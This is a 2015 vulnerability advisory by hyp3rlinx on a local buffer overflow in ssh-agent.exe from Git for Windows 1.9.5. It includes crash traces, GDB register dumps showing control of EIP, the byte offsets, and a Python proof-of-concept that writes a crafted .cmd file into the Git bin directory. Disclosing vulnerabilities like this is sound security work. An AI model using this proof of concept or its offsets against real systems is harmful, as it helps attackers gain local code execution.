[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt Vendor: ================================ git-scm.com Product: ================================ Git-1.9.5-preview20150319.exe github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319 Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ========================= Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible. Fault module seems to be msys-1.0.dll File Name: msys-1.0.dll MD5: 39E779952FF35D1EB3F74B9C36739092 APIVersion: 0.46 Stack trace: ------------- MSYS-1.0.12 Build:2012-07-05 14:56 Exception: STATUS_ACCESS_VIOLATION at eip=41414141 eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC ebp=42424242 esp=0028F9B4 program=C:Program Files (x86)Gitbinssh-agent.exe cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B Payload of 944 bytes to cause seg fault: @ 948 bytes we completely overwrite EBP register. @ 972 bytes KABOOOOOOOOOOM! we control EIP. Quick GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info r eax 0xffffffff -1 ecx 0x680a4c3a 1745505338 edx 0x680a4c3a 1745505338 ebx 0x28f90c 2685196 esp 0x28f884 0x28f884 ebp 0x41414141 0x41414141 esi 0x28f8fc 2685180 edi 0x2660 9824 eip 0x41414141 0x41414141 eflags 0x10246 [ PF ZF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 POC code(s): =============== Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP. Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it! import struct,os,shutil #Git ssh-agent.exe #EIP overwrite at 972 bytes #By hyp3rlinx #====================================================== file="C:\Program Files (x86)\Git\bin\ssh_agent_hell" payload="CALL ssh-agent.exe " x=open(file,"w") eip="A"*4 payload+="B"*968+eip x.write(payload) x.close() src="C:\Program Files (x86)\Git\bin\" shutil.move(file,file+".cmd") print "Git ssh-agent.exe buffer overflow POC\n" print "ssh_agent_hell.cmd file created!...\n" print "by hyp3rlinx" print "====================================\n" Disclosure Timeline: ========================================================= Vendor Notification: August 10, 2015 Sept 26, 2015 : Public Disclosure Exploitation Technique: ======================= Local Description: ========================================================== Vulnerable Product: [+] Git-1.9.5-preview20150319.exe =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx